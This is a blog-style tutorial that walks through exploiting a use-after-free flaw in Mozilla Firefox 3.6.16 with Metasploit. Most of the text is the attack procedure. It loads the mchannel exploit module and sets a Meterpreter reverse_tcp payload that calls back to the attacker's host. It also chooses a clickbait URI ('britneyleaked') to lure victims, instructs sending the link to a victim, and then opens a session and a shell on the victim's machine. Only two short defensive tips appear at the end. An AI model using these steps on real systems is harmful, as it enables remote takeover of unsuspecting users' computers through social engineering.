Type : Tutorial
Level : Medium
Platform : Windows XP SP3
Application Version : Mozilla Firefox 3.6.16
Actually I got this news a few months ago from mailing list securityfocus.com about vulnerability in Mozilla Firefox version 3.6.16. Below are the details of that vulnerability :
— Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Mozilla Firefox. User interaction is
required to exploit this vulnerability in that the target must visit a
The specific flaw exists within the OnChannelRedirect method. When an
OBJECT element has no mChannel assigned, it is possible to call the
|OnChannelRedirect| method, setting a nearly arbitrary object as the
channel in use. |mChannel| will become a dangling pointer, allowing an
attacker to execute arbitrary code under the context of the user running
from : securityfocus.com
You also can see the last tutorial about nsTreeRange Vulnerability in Mozilla Firefox that i wrote in this blog before this post.
How to exploit this vulnerability browser by using Metasploit Framework? Let’s try and do the step by step below.
2. Operating System(I’m using Backtrack 5 in this tutorial)
3. Mozilla mChannel exploit
1. Go to your Backtrack 5 console(CTRL+ALT+T) and type msfupdate to update the metasploit database.
cp mozilla_mchannel.rb /pentest/exploits/framework3/modules/exploit/windows/browser
3. When finish downloading and installing updates, type msfconsole to go to metasploit console. Why using console?after you trying metasploit web, GUI, etc..that using console is faster than the other 🙂 .
4. Inside metasploit console, run following command :
use exploit/windows/browser/mozilla_mchannel --> set up the exploit set payload windows/meterpreter/reverse_tcp --> set up the payload we want to get after exploit executed
5. If you want to see what options can configured in this exploit and payload, run show options command. The picture below was my configuration when set up the options.
set srvhost 192.168.8.92 --> set up server to receive connection from victim. Change 192.168.8.92 with your IP address. set srvport 80 --> what port you want to use when the victim accessed the vulnerable link? I'm use 80 because it's the best and looks the same with other web server(social engineering). set uripath britneyleaked --> this uripath used to make your victim a little curious about the content. the result will be like this http://YOUR_IP_ADDRESS/URIPATH. set lhost 192.168.8.92 --> where the payload connect after exploit success to execute(use your ip address). set lport 443 --> which port you want to use for the payload?I'm choose 443 because it's nice :-P .
When everything set up correctly, run exploit command to start your server to work. In the picture above the URL generated by server was http://192.168.8.92/britneyleaked, this URL you should send to your victim. Don’t close your console windows until this step, because it will show the progress when victim being exploited.
6. When the victim open the malicious URL in their vulnerable Mozilla Firefox, our console window show some progress and it’s success.
7. run sessions -l command to view are there any active session created after the user successfully exploited or no. If you find nothing, that mean the exploit was not successful.
8. Start interacting with available session by using sessions -i 1 where 1 is sessionID.
Inside the meterpreter console, run sysinfo to know about the system information of victim machine. If you want to got their shell just run shell from meterpreter console to got their command prompt.
1. Always update your web browser to the latest version.
2. Do not click the link that you didn’t know or suspicious.
Hope you enjoyed 🙂